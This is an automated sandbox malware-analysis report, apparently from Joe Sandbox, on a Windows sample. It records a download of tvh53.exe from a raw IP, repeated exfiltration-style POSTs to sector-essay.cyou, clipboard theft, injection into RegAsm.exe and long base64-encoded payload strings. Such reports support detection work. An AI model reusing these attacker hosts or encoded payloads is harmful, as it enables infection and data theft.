00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Source: global trafficHTTP traffic detected: GET /infopage/tvh53.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.47.136:443
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sector-essay.cyou
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sector-essay.cyou
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BF8HSG09User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12780Host: sector-essay.cyou
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=URWJUSLA0OTC7DX0WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15076Host: sector-essay.cyou
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IT1UG7M6MS1IK92FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20560Host: sector-essay.cyou
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q50S24M0B9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1208Host: sector-essay.cyou
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7YVFSTRYYY2PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569419Host: sector-essay.cyou
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: sector-essay.cyou
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: global trafficHTTP traffic detected: GET /infopage/tvh53.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: sector-essay.cyou
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sector-essay.cyou
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/tvh53.exe
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/tvh53.exeP
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2267546315.0000000001570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sector-essay.cyou/
        Source: RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sector-essay.cyou/5
        Source: RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2267846615.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2267546315.0000000001570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sector-essay.cyou/api
        Source: RegAsm.exe, 00000005.00000002.2267846615.00000000015F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sector-essay.cyou/apiC
        Source: RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sector-essay.cyou/apiO
        Source: RegAsm.exe, 00000005.00000002.2267846615.00000000015F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sector-essay.cyou/apie
        Source: RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sector-essay.cyou/apij
        Source: RegAsm.exe, 00000005.00000002.2267546315.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sector-essay.cyou:443/api
        Source: RegAsm.exe, 00000005.00000002.2267546315.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sector-essay.cyou:443/apiMicrosoft
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49722 version: TLS 1.2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00433A50 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_00433A50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00433A50 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_00433A50

        System Summary

        barindex
        .NET source code contains very large strings
        Source: ZjH6H6xqo7.exe, Sap.csLong String: Length: 18812
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004392505_2_00439250
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00408A705_2_00408A70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042E3BE5_2_0042E3BE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00441CB05_2_00441CB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00422D105_2_00422D10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00409E215_2_00409E21
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00438ED05_2_00438ED0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00420EF05_2_00420EF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004277C05_2_004277C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004338205_2_00433820
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004068305_2_00406830
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042E03F5_2_0042E03F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004098C05_2_004098C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042E0CB5_2_0042E0CB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004288DD5_2_004288DD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004288F85_2_004288F8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004048805_2_00404880
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004300825_2_00430082
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004388B05_2_004388B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004290B15_2_004290B1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004249575_2_00424957
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004059175_2_00405917
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041990C5_2_0041990C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040E9115_2_0040E911
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004059175_2_00405917
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004251D05_2_004251D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042C9E35_2_0042C9E3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042C1F05_2_0042C1F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B1FA5_2_0041B1FA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004061805_2_00406180
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042AA595_2_0042AA59
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402A705_2_00402A70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004402105_2_00440210
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042A2355_2_0042A235
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042FAD85_2_0042FAD8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004402F05_2_004402F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041E3045_2_0041E304
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041F3C05_2_0041F3C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042C3D05_2_0042C3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043C3D05_2_0043C3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042D3045_2_0042D304
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041EB805_2_0041EB80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042AB835_2_0042AB83
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043CB805_2_0043CB80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004213AD5_2_004213AD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004254405_2_00425440
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00430C615_2_00430C61
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004094105_2_00409410
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00406CC05_2_00406CC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00405CC05_2_00405CC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004034905_2_00403490
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041C4BC5_2_0041C4BC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041FD505_2_0041FD50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00427D615_2_00427D61
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00428D615_2_00428D61
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042ED095_2_0042ED09
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040AD205_2_0040AD20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042EDCA5_2_0042EDCA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004255D05_2_004255D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041CDE05_2_0041CDE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043FDE05_2_0043FDE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042B5805_2_0042B580
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004255A45_2_004255A4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004335B05_2_004335B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004386505_2_00438650
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004086705_2_00408670
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00403E705_2_00403E70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00419ECF5_2_00419ECF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418E835_2_00418E83
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040B7695_2_0040B769
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004417205_2_00441720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00423F265_2_00423F26
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041AFC25_2_0041AFC2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042C7C65_2_0042C7C6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004077D05_2_004077D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004297D05_2_004297D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041A7835_2_0041A783
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041FF905_2_0041FF90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004317905_2_00431790
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00426F9E5_2_00426F9E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00408450 appears 40 times
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002FC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameup5gphgh.dll4 vs ZjH6H6xqo7.exe
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2073668384.000000000118E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ZjH6H6xqo7.exe
        Source: ZjH6H6xqo7.exe, 00000000.00000000.2041679917.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHilif.exe, vs ZjH6H6xqo7.exe
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2075583120.0000000005CF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameup5gphgh.dll4 vs ZjH6H6xqo7.exe
        Source: ZjH6H6xqo7.exeBinary or memory string: OriginalFilenameHilif.exe, vs ZjH6H6xqo7.exe
        Source: ZjH6H6xqo7.exe, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
        Source: ZjH6H6xqo7.exe, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNF